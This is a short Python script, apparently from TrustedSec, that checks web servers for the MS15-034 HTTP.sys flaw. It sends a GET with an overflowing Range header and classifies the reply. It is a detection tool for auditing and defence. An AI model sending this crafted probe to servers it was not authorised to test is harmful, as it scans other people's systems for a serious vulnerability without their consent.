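# Quick MS15-034 checker that supports HTTP/HTTPS
# Written by David Kennedy @ TrustedSec
# Blog: https://www.trustedsec.com/april-2015/ms15-034-range-header-integer-overflow/
#
# How the check works: one GET is sent with a Range header whose end offset is
# 2**64 - 1 (18446744073709551615) and the answer is classified:
#   * "Requested Range Not Satisfiable" (HTTP 416) -> reported as appearing vulnerable
#   * "The request has an invalid header name"      -> reported as not vulnerable
#   * anything else                                 -> printed so the operator can judge
#
# The verdict is a heuristic based on a single response. A reverse proxy, WAF or
# load balancer in front of the host can change what comes back, so confirm any
# result against the installed updates on the server itself.
# NOTE(review): the outcome may also depend on which resource the URL points at;
# verify against a known-patched and a known-unpatched host before trusting it.
import sys

try:
    import urllib2  # Python 2
except ImportError:
    # Python 3 exposes the same Request / build_opener API under urllib.request.
    import urllib.request as urllib2

# Upper bound for the probe so an unresponsive host cannot hang the check.
TIMEOUT_SECONDS = 10


def print_usage():
    """Print the banner and usage text shown when no usable URL is supplied."""
    print('')
    print("MS15-034 Checker written by Dave Kennedy @ TrustedSec")
    print("Original PoC used from here http://pastebin.com/ypURDPc4")
    print("Supports HTTP/HTTPS")
    print("Usage: python ms15-034.py <http(s)://url>")
    print('')


try:
    url = sys.argv[1]
except IndexError:
    print_usage()
    sys.exit(0)

# The default opener also handles file:// and ftp://, which are meaningless for
# this check, and a URL without a scheme fails with an unhelpful traceback.
if not url.lower().startswith(("http://", "https://")):
    print_usage()
    sys.exit(0)

request = urllib2.Request(url)
request.add_header('Range', 'bytes=0-18446744073709551615')
opener = urllib2.build_opener()

# Both values are set before the request so the final test below can never hit
# an unbound name when the request raises.
feeddata = ""
got_error = False
try:
    feeddata = opener.open(request, timeout=TIMEOUT_SECONDS).read()
except Exception as e:
    # Broad on purpose: HTTP errors, connection failures, TLS errors and
    # timeouts are all reported to the operator instead of ending in a traceback.
    got_error = True
    if "Requested Range Not Satisfiable" in str(e):
        print("[*] Server appears to be vulnerable - got requested 'Request Range Not Satisfiable'.")
    else:
        print("[*] Does not appear to be vulnerable or got a different response. Printing response: " + str(e))
    # An HTTP error response still has a body; keep it so the header-name
    # rejection text can be recognised below.
    if hasattr(e, "read"):
        feeddata = e.read()

# Python 3 returns bytes from read(); normalise so the substring test works on
# both interpreter lines.
if isinstance(feeddata, bytes):
    feeddata = feeddata.decode("utf-8", "replace")

if "The request has an invalid header name" in feeddata or not got_error:
    print("[*] Does not appear to be vulnerable. Congrats! Or if you are a hacker, sorry dude :(")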